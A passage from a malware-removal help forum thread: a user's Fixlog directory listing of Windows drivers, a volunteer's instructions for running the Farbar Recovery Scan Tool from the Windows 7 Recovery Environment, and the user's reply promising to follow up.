2009-07-14  00:31            14ÿ336 wmiacpi.sys
2009-07-14  00:31            17ÿ664 CmBatt.sys
2009-07-14  00:31             9ÿ728 errdev.sys
2009-07-14  00:31            26ÿ624 hidbatt.sys
2009-07-14  00:35            45ÿ056 blbdrive.sys
2009-07-14  00:37            40ÿ448 discache.sys
2009-07-14  00:37            42ÿ496 watchdog.sys
2009-07-14  00:38            16ÿ896 dxapi.sys
2009-07-14  00:38            98ÿ816 dxg.sys
2009-07-14  00:38            29ÿ184 vga.sys
2009-07-14  00:38            29ÿ184 vgapnp.sys
2009-07-14  00:38           129ÿ024 videoprt.sys
2009-07-14  00:38            30ÿ208 monitor.sys
2009-07-14  01:00             6ÿ656 beep.sys
2009-07-14  01:00             6ÿ784 mspqm.sys
2009-07-14  01:00             7ÿ168 mspclock.sys
2009-07-14  01:00             8ÿ064 mstee.sys
2009-07-14  01:00            11ÿ136 mskssrv.sys
2009-07-14  01:00            20ÿ992 ksthunk.sys
2009-07-14  01:00            26ÿ624 sermouse.sys
2009-07-14  01:00            31ÿ232 mouhid.sys
2009-07-14  01:00            23ÿ552 serenum.sys
2009-07-14  01:00            20ÿ992 smclib.sys
2009-07-14  01:00            94ÿ208 serial.sys
2009-07-14  01:00            97ÿ280 parport.sys
2009-07-14  01:00            24ÿ576 flpydisk.sys
2009-07-14  01:00            29ÿ696 fdc.sys
2009-07-14  01:01            14ÿ336 sffdisk.sys
2009-07-14  01:01            16ÿ896 sfloppy.sys
2009-07-14  01:01            13ÿ824 sffp_mmc.sys
2009-07-14  01:01            29ÿ184 tape.sys
2009-07-14  01:01            22ÿ016 mcd.sys
2009-07-14  01:02            27ÿ776 wacompen.sys
2009-07-14  01:02            15ÿ360 MTConfig.sys
2009-07-14  01:06            68ÿ864 stream.sys
2009-07-14  01:06            46ÿ592 hidir.sys
2009-07-14  01:06             8ÿ192 mshidkmdf.sys
2009-07-14  01:06            45ÿ568 circlass.sys
2009-07-14  01:06            68ÿ096 1394bus.sys
2009-07-14  01:06            72ÿ832 ohci1394.sys
2009-07-14  01:06           100ÿ864 hidbth.sys
2009-07-14  01:06            72ÿ192 bthmodem.sys
2009-07-14  01:06             9ÿ728 umpass.sys
2009-07-14  01:07            24ÿ576 vwifibus.sys
2009-07-14  01:07            59ÿ904 vwififlt.sys
2009-07-14  01:07            17ÿ920 vwifimp.sys
2009-07-14  01:08            35ÿ328 ndiscap.sys
2009-07-14  01:08            60ÿ928 lltdio.sys
2009-07-14  01:08            76ÿ800 rspndr.sys
2009-07-14  01:08            17ÿ920 irenum.sys
2009-07-14  01:09           120ÿ320 irda.sys
2009-07-14  01:09            93ÿ184 smb.sys
2009-07-14  01:09            12ÿ800 wfplwf.sys
2009-07-14  01:09            46ÿ592 qwavedrv.sys
2009-07-14  01:09            41ÿ472 RNDISMP.sys
2009-07-14  01:10           116ÿ224 ipnat.sys
2009-07-14  01:10            14ÿ848 rasacd.sys
2009-07-14  01:10            23ÿ040 asyncmac.sys
2009-07-14  01:10            92ÿ672 raspppoe.sys
2009-07-14  01:10            60ÿ416 agilevpn.sys
2009-07-14  01:10            83ÿ968 rassstp.sys
2009-07-14  01:10            21ÿ504 ws2ifsl.sys
2009-07-14  01:10            11ÿ264 rootmdm.sys
2009-07-14  01:10            40ÿ448 modem.sys
2009-07-14  01:16            15ÿ872 tdpipe.sys
2009-07-14  01:16             7ÿ680 RDPENCDD.sys
2009-07-14  01:16             7ÿ680 RDPCDD.sys
2009-07-14  01:16             8ÿ192 RDPREFMP.sys
2009-07-14  01:17            24ÿ064 rdpbus.sys
2009-07-14  01:35            12ÿ288 serscan.sys
2009-07-14  01:38            25ÿ088 usbprint.sys
2009-07-14  02:01            95ÿ232 bridge.sys
2009-07-14  02:19           286ÿ720 BrSerId.sys
2009-07-14  02:43            55ÿ128 dumpfve.sys
2009-07-14  02:45           128ÿ592 ql40xx.sys
2009-07-14  02:45            43ÿ584 sisraid2.sys
2009-07-14  02:45            12ÿ352 pciide.sys
2009-07-14  02:45           220ÿ752 pcmcia.sys
2009-07-14  02:45            50ÿ768 pcw.sys
2009-07-14  02:45            80ÿ464 sisraid4.sys
2009-07-14  02:45         1ÿ524ÿ816 ql2300.sys
2009-07-14  02:45            48ÿ720 pciidex.sys
2009-07-14  02:45            19ÿ008 spldr.sys
2009-07-14  02:45            12ÿ496 swenum.sys
2009-07-14  02:45            64ÿ080 UAGP35.SYS
2009-07-14  02:45            24ÿ656 stexstor.sys
2009-07-14  02:45            64ÿ592 ULIAGPKX.SYS
2009-07-14  02:45            21ÿ056 wd.sys
2009-07-14  02:45            17ÿ488 viaide.sys
2009-07-14  02:45            36ÿ432 vdrvroot.sys
2009-07-14  02:45           161ÿ872 vsmraid.sys
2009-07-14  02:45            16ÿ464 wmilib.sys
2009-07-14  02:45            22ÿ096 wimmount.sys
2009-07-14  02:47            65ÿ088 GAGP30KX.SYS
2009-07-14  02:47            24ÿ144 crcdisk.sys
2009-07-14  02:47            28ÿ736 Dumpata.sys
2009-07-14  02:47            39ÿ504 crashdmp.sys
2009-07-14  02:47            73ÿ280 disk.sys
2009-07-14  02:47           530ÿ496 elxstor.sys
2009-07-14  02:47            70ÿ224 fileinfo.sys
2009-07-14  02:47            55ÿ376 fsdepends.sys
2009-07-14  02:48            50ÿ768 kbdclass.sys
2009-07-14  02:48            16ÿ960 intelide.sys
2009-07-14  02:48            44ÿ112 iirsp.sys
2009-07-14  02:48           106ÿ560 lsi_sas.sys
2009-07-14  02:48            65ÿ600 lsi_sas2.sys
2009-07-14  02:48           115ÿ776 lsi_scsi.sys
2009-07-14  02:48           114ÿ752 lsi_fc.sys
2009-07-14  02:48            35ÿ392 megasas.sys
2009-07-14  02:48           284ÿ736 MegaSR.sys
2009-07-14  02:48            20ÿ544 isapnp.sys
2009-07-14  02:48           122ÿ960 NV_AGP.SYS
2009-07-14  02:48            51ÿ264 nfrd960.sys
2009-07-14  02:48            15ÿ424 msisadrv.sys
2009-07-14  02:48            49ÿ216 mouclass.sys
2009-07-14  02:48            32ÿ320 mssmbios.sys
2009-07-14  02:48            60ÿ496 mup.sys
2009-07-14  02:52           194ÿ128 amdsbs.sys
2009-07-14  02:52            15ÿ440 aliide.sys
2009-07-14  02:52            87ÿ632 arc.sys
2009-07-14  02:52            24ÿ128 atapi.sys
2009-07-14  02:52            97ÿ856 arcsas.sys
2009-07-14  02:52           491ÿ088 adp94xx.sys
2009-07-14  02:52           182ÿ864 adpu320.sys
2009-07-14  02:52            28ÿ240 battc.sys
2009-07-14  02:52            15ÿ440 amdide.sys
2009-07-14  02:52           339ÿ536 adpahci.sys
2009-07-14  02:52            61ÿ008 AGP440.sys
2009-07-14  02:52            21ÿ584 compbatt.sys
2009-07-14  02:52            17ÿ488 cmdide.sys
2009-08-21  01:52            79ÿ976 xusb21.sys
2010-11-08  14:45            24ÿ576 SiLib.sys
2010-11-08  14:45            19ÿ456 SiUSBXp.sys
2010-11-20  12:35            59ÿ392 vpcnfltr.sys
2010-11-20  12:35            95ÿ232 vpcusb.sys
2010-11-20  14:34           194ÿ944 vpchbus.sys
2010-11-20  14:34           360ÿ832 vpcvmm.sys
2010-11-21  04:23            31ÿ232 TsUsbGD.sys
2010-11-21  04:23            41ÿ984 winusb.sys
2010-11-21  04:23           350ÿ208 HdAudio.sys
2010-11-21  04:23            14ÿ336 sffp_sd.sys
2010-11-21  04:23           140ÿ672 msdsm.sys
2010-11-21  04:23           155ÿ008 mpio.sys
2010-11-21  04:23            38ÿ912 CompositeBus.sys
2010-11-21  04:23            12ÿ800 acpipmi.sys
2010-11-21  04:23            63ÿ360 termdd.sys
2010-11-21  04:23           122ÿ368 hdaudbus.sys
2010-11-21  04:23            71ÿ552 volmgr.sys
2010-11-21  04:23           184ÿ704 pci.sys
2010-11-21  04:23            33ÿ280 kbdhid.sys
2010-11-21  04:23           229ÿ888 1394ohci.sys
2010-11-21  04:23           166ÿ272 nvstor.sys
2010-11-21  04:23           215ÿ936 vhdmp.sys
2010-11-21  04:23           148ÿ352 nvraid.sys
2010-11-21  04:23           410ÿ496 iaStorV.sys
2010-11-21  04:23            27ÿ008 amdxata.sys
2010-11-21  04:23           107ÿ904 amdsata.sys
2010-11-21  04:23            78ÿ720 HpSAMD.sys
2010-11-21  04:23           103ÿ808 sbp2port.sys
2010-11-21  04:23           147ÿ456 cdrom.sys
2010-11-21  04:23           334ÿ208 acpi.sys
2010-11-21  04:23            48ÿ640 umbus.sys
2010-11-21  04:23            31ÿ104 msahci.sys
2010-11-21  04:23           155ÿ520 ataport.sys
2010-11-21  04:23           273ÿ792 msiscsi.sys
2010-11-21  04:23            78ÿ848 IPMIDrv.sys
2010-11-21  04:23            46ÿ464 vmstorfl.sys
2010-11-21  04:23             6ÿ656 vms3cap.sys
2010-11-21  04:23            21ÿ760 VMBusHID.sys
2010-11-21  04:23            71ÿ168 dmvsc.sys
2010-11-21  04:23           199ÿ552 vmbus.sys
2010-11-21  04:23            52ÿ096 winhv.sys
2010-11-21  04:23            34ÿ688 storvsc.sys
2010-11-21  04:23            34ÿ816 terminpt.sys
2010-11-21  04:23           117ÿ248 tsusbhub.sys
2010-11-21  04:23            88ÿ960 Synth3dVsc.sys
2010-11-21  04:23           172ÿ544 WUDFRd.sys
2010-11-21  04:23           112ÿ128 WUDFPf.sys
2010-11-21  04:23            45ÿ056 tcpipreg.sys
2010-11-21  04:23           328ÿ192 udfs.sys
2010-11-21  04:24           171ÿ392 scsiport.sys
2010-11-21  04:24           189ÿ824 storport.sys
2010-11-21  04:24            26ÿ624 tdi.sys
2010-11-21  04:24           164ÿ352 ndiswan.sys
2010-11-21  04:24            29ÿ696 scfilter.sys
2010-11-21  04:24            32ÿ896 USBCAMD2.sys
2010-11-21  04:24           366ÿ976 msrpc.sys
2010-11-21  04:24           125ÿ440 tunnel.sys
2010-11-21  04:24           243ÿ712 ks.sys
2010-11-21  04:24            27ÿ520 Diskdump.sys
2010-11-21  04:24            14ÿ720 hwpolicy.sys
2010-11-21  04:24           179ÿ072 Classpnp.sys
2010-11-21  04:24            82ÿ944 ipfltdrv.sys
2010-11-21  04:24            56ÿ832 ndisuio.sys
2010-11-21  04:24           111ÿ104 raspptp.sys
2010-11-21  04:24           129ÿ536 rasl2tp.sys
2010-11-21  04:24            59ÿ392 TsUsbFlt.sys
2010-11-21  04:24           223ÿ248 fvevol.sys
2010-11-21  04:24            31ÿ744 usbrpm.sys
2010-11-21  04:24           514ÿ560 csc.sys
2010-11-21  04:25           165ÿ888 rdpdr.sys
2011-02-25  07:25           296ÿ320 volsnap.sys
2011-08-11  15:55             1ÿ332 DTSU2P.DAT
2012-02-17  05:57            23ÿ552 tdtcp.sys
2012-03-01  07:46            23ÿ408 fs_rec.sys
2012-03-17  08:58            75ÿ120 partmgr.sys
2012-06-08  14:29           130ÿ952 ghsat.sys
2012-06-08  14:29           130ÿ952 ghsdiagAP.sys
2012-06-08  14:29           130ÿ952 ghsdiagMDM.sys
2012-06-08  14:29           130ÿ952 ghsmdm.sys
2012-06-08  14:29           130ÿ952 ghsnmea.sys
2012-06-08  14:29            20ÿ232 massfilter_hs.sys
2012-06-08  14:29           131ÿ080 zghsat.sys
2012-06-08  14:29           131ÿ080 zghsdiag.sys
2012-06-08  14:29           131ÿ080 zghsdiagmdm.sys
2012-06-08  14:29           131ÿ080 zghsmdm.sys
2012-06-08  14:29           131ÿ080 zghsnmea.sys
2012-06-08  14:29           165ÿ128 zghsnet.sys
2012-06-08  14:29           131ÿ080 zghstrace.sys
2012-06-08  14:29           131ÿ080 zghsvousb.sys
2012-06-08  14:29            41ÿ224 zghsvcom.sys
2012-11-28  23:56                 3 MsftWdf_Kernel_01011_Inbox_Critical.Wdf
2012-11-28  23:56            54ÿ376 WdfLdr.sys
2012-12-27  00:26           805ÿ088 Rt64win7.sys
2013-02-12  05:12            19ÿ968 usb8023.sys
2013-04-26  09:24           368ÿ112 iusb3hub.sys
2013-04-26  09:24           786ÿ416 iusb3xhc.sys
2013-04-26  09:24            20ÿ464 iusb3hcs.sys
2013-04-26  09:24            41ÿ984 USB3Ver.dll
2013-04-30  11:55            25ÿ120 SaiMini.sys
2013-04-30  11:55            52ÿ640 SaiBus.sys
2013-06-05  06:18            17ÿ224 ssadcm.sys
2013-06-05  06:18            17ÿ736 ssadwhnt.sys
2013-06-05  06:18            17ÿ736 ssadwh.sys
2013-06-05  06:18           158ÿ024 ssadserd.sys
2013-06-05  06:18           188ÿ232 ssadmdm.sys
2013-06-05  06:18            21ÿ320 ssadmdfl.sys
2013-06-05  06:18            17ÿ224 ssadcmnt.sys
2013-06-05  06:18            38ÿ080 ssadadb.sys
2013-06-05  06:18           169ÿ288 ssadbus.sys
2013-06-05  06:18         1ÿ919ÿ168 WdfCoInstaller01005.dll
2013-06-13  18:20         5ÿ448ÿ460 rtvienna.dat
2013-06-25  15:25           602ÿ901 RTAIODAT.DAT
2013-06-25  17:42         3ÿ462ÿ616 RTKVHD64.sys
2013-06-25  23:55           785ÿ624 Wdf01000.sys
2013-07-12  11:40           109ÿ824 USBAUDIO.sys
2013-07-12  11:41           100ÿ864 usbcir.sys
2013-07-12  11:41           185ÿ344 usbvideo.sys
2013-10-17  21:31                 0 Msft_User_WpdFs_01_09_00.Wdf
2013-10-17  21:58                 0 Msft_Kernel_iusb3hcs_01009.Wdf
2013-10-17  23:53                 0 Msft_Kernel_rzudd_01009.Wdf
2013-10-17  23:53                 0 Msft_Kernel_rzdaendpt_01009.Wdf
2013-10-17  23:53                 0 Msft_Kernel_rzp1endpt_01009.Wdf
2013-10-18  00:08           381ÿ440 sptd.sys
2013-10-18  00:10           283ÿ064 dtsoftbus01.sys
2013-11-29  19:10                 0 Msft_Kernel_ssadadb_01005.Wdf
2014-01-06  14:21                 0 Msft_Kernel_xusb21_01009.Wdf
2014-02-04  23:25                 0 Msft_User_WpdMtpDr_01_09_00.Wdf
2014-05-10  09:11         1ÿ795ÿ952 WdfCoInstaller01011.dll
2014-05-27  00:13            34ÿ016 xb1usb.sys
2014-06-26  11:03            29ÿ440 I1KBFLTR.sys
2014-07-17  02:21           212ÿ480 rdpwd.sys
2014-08-05  09:29           179ÿ872 SaiK075C.sys
2015-01-09  16:22                 0 Msft_Kernel_SaiK075C_01009.Wdf
2015-05-08  17:00            43ÿ664 hitmanpro37.sys
2015-05-10  13:32            98ÿ464 vrtaucbl.sys
2015-06-16  22:01            62ÿ072 OCUSBVID.sys
2015-08-13  16:19            50ÿ904 rzp1endpt.sys
2015-08-13  16:19           201ÿ432 rzudd.sys
2015-08-13  16:19            43ÿ720 rzdaendpt.sys
2015-08-13  16:19            44ÿ232 rzvkeyboard.sys
2015-08-13  16:19            42ÿ712 rzvmouse.sys
2015-11-05  10:53           146ÿ944 rmcast.sys
2015-12-08  19:11             5ÿ632 drmkaud.sys
2015-12-08  19:12           230ÿ400 portcls.sys
2015-12-08  19:54           116ÿ736 drmk.sys
2015-12-14  23:24           130ÿ880 rzpnk.sys
2015-12-18  12:54                 0 Msft_Kernel_OCUSBVID_01011.Wdf
2015-12-21  16:01            47ÿ736 tap0901t.sys
2015-12-29  21:35                 0 Msft_Kernel_xb1usb_01011.Wdf
2016-02-03  19:07            91ÿ648 USBSTOR.SYS
2016-06-14  18:11           663ÿ552 PEAuth.sys
2016-08-25  09:46           135ÿ928 NisDrvWFP.sys
2016-08-25  09:46           295ÿ000 MpFilter.sys
2016-09-08  15:55           142ÿ336 mrxdav.sys
2016-09-17  02:12            44ÿ144 rzpmgrk.sys
2016-10-05  15:54            90ÿ112 bowser.sys
2016-11-20  15:07           467ÿ392 cng.sys
2016-12-12  14:30           206ÿ080 ssudmdm.sys
2016-12-12  14:30           110ÿ336 ssudbus.sys
2017-03-10  16:55           195ÿ584 exfat.sys
2017-03-10  16:55           205ÿ312 fastfat.sys
2017-04-04  15:53           496ÿ128 afd.sys
2017-05-07  16:33            94ÿ440 mountmgr.sys
2017-05-16  16:35           265ÿ448 dxgmms1.sys
2017-05-16  16:35           986ÿ856 dxgkrnl.sys
2017-06-02  03:44            46ÿ408 ssdevfactory.sys
2017-07-07  16:33           363ÿ752 volmgrx.sys
2017-07-29  15:56           117ÿ248 tdx.sys
2017-08-11  06:58            26ÿ112 nsiproxy.sys
2017-08-11  07:00           262ÿ656 netbt.sys
2017-08-13  22:45            20ÿ992 rdpvideominiport.sys
2017-08-13  22:45            40ÿ448 tssecsrv.sys
2017-09-13  16:05           324ÿ608 nwifi.sys
2017-10-12  01:20           113ÿ152 luafv.sys
2017-10-12  01:20           317ÿ440 rdbss.sys
2017-10-18  03:06             7ÿ808 usbd.sys
2017-10-18  03:06            30ÿ720 usbuhci.sys
2017-10-18  03:06            25ÿ600 usbohci.sys
2017-10-18  03:06           327ÿ168 usbport.sys
2017-10-18  03:06            56ÿ320 usbehci.sys
2017-10-18  03:06            99ÿ840 usbccgp.sys
2017-10-18  03:06           344ÿ064 usbhub.sys
2017-11-09  05:01           233ÿ904 nvhda64v.sys
2017-11-16  02:38            57ÿ976 nvvhci.sys
2017-11-29  09:11            77ÿ432 mbae64.sys
2017-12-15  03:03            59ÿ240 nvvad64v.sys
2017-12-17  15:08                 0 Msft_Kernel_ssdevfactory_01011.Wdf
2018-01-01  02:41           754ÿ176 http.sys
2018-01-01  02:41           106ÿ496 dfsc.sys
2018-01-01  02:42           168ÿ448 srvnet.sys
2018-01-01  02:42           406ÿ016 srv2.sys
2018-01-01  02:42           460ÿ288 srv.sys
2018-01-01  02:54            77ÿ312 mpsdrv.sys
2018-01-01  02:55            45ÿ056 netbios.sys
2018-01-01  02:55           131ÿ584 pacer.sys
2018-01-01  02:55            24ÿ064 ndistapi.sys
2018-01-01  02:55            58ÿ368 ndproxy.sys
2018-01-01  02:55            88ÿ576 wanarp.sys
2018-01-01  03:21           288ÿ488 fltMgr.sys
2018-01-01  03:21           948ÿ968 ndis.sys
2018-01-01  03:21         1ÿ680ÿ616 ntfs.sys
2018-01-01  03:21           213ÿ736 rdyboost.sys
2018-01-12  17:02           129ÿ536 mrxsmb20.sys
2018-01-12  17:02           291ÿ328 mrxsmb10.sys
2018-01-12  17:03           159ÿ744 mrxsmb.sys
2018-01-12  17:11            62ÿ464 appid.sys
2018-01-12  17:15            32ÿ896 hidparse.sys
2018-01-12  17:16            76ÿ288 hidclass.sys
2018-01-12  17:16            30ÿ208 hidusb.sys
2018-01-12  17:44           287ÿ976 FWPKCLNT.SYS
2018-01-12  17:44           154ÿ856 ksecpkg.sys
2018-01-12  17:44            95ÿ464 ksecdd.sys
2018-01-12  17:44           377ÿ064 netio.sys
2018-01-12  17:44         1ÿ894ÿ120 tcpip.sys
2018-02-25  06:40        17ÿ353ÿ248 nvlddmkm.sys
2018-03-02  09:16           255ÿ928 5143D20B.sys
2018-03-02  09:25           255ÿ928 642A2717.sys
2018-03-02  11:13           253ÿ880 mbamswissarmy.sys
2018-03-19  16:55           192ÿ952 mbamchameleon.sys
2018-03-19  19:58            28ÿ272 TrueSight.sys
             377 File(s)     83ÿ708ÿ634 bytes
               0 Dir(s)  96ÿ954ÿ761ÿ216 bytes free

========= End of CMD: =========


==== End of Fixlog 18:12:49 ====


Edited by mortn, 22 March 2018 - 12:15 PM.


#14 nasdaq

nasdaq

  • Malware Response Team
  • 40,454 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:09 PM

Posted 23 March 2018 - 08:01 AM

Hi,

This infection may be stopping many services.

The first thing we must do is remove it.

Read or print these instructions. It may help you. Follow them carefully.

Lets proceed:

Preparing the USB Flash Drive[/colo]

Using the Clean computer download the right version of Farbar program for your system to Desktop.
64-bit or 32 bit version. Select the one you need.
https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/

Move the executable (FRST.exe or FRST64.exe) to your USB Flash Drive
 

How to determine whether a computer is running a 32-bit version or 64-bit version of the Windows operating system.
https://support.microsoft.com/en-us/help/827218/how-to-determine-whether-a-computer-is-running-a-32-bit-version-or-64

===

[color=#9932CC]Boot in the Recovery Environment WINDOWS 7 USERS.

To enter the Recovery Environment with Windows Vista and Windows 7, follow the instructions below:
Restart the computer
Once you've seen your BIOS splashscreen (the computer manufacturer logo), tap the F8 key repeatedly until the Advanced Boot Options menu appears

Look at this video if not familiar with it.
http://www.informit.com/articles/article.aspx?p=1400870

Use the arrow keys to select Repair your computer, and press on Enter
Select your keyboard layout (US, French, etc.) and click on Next

Once in the command prompt
Plug your USB Flash Drive in the infected computer
---

Click on Command Prompt to open the command prompt

In the command prompt, type notepad and press on Enter
Notepad will open. Click on the File menu and select Open
Click on Computer/This PC, find the letter for your USB Flash Drive, then close the window and Notepad

In the command prompt, type e:\frst.exe (for the x64 version, type e:\frst64.exe and press on Enter

Note: Replace the letter e with the drive letter of your USB Flash Drive

FRST will open

Click on Yes to accept the disclaimer
Click on the Scan button and wait for the scan to complete
A log called fixlog.txt will be saved on your USB Flash Drive. Attach it in your next reply.

Wait for further instructions.

p.s.
If at any time you need additional information please ask before proceeding.

#15 mortn

mortn
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:08:09 PM

Posted 26 March 2018 - 02:54 AM

Hello and thanks for the info. I will do the requested tasks as soon as I can. I am. Unfortunately I am away on a busines trip and will return home in a few days. Sorry about thr delay.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users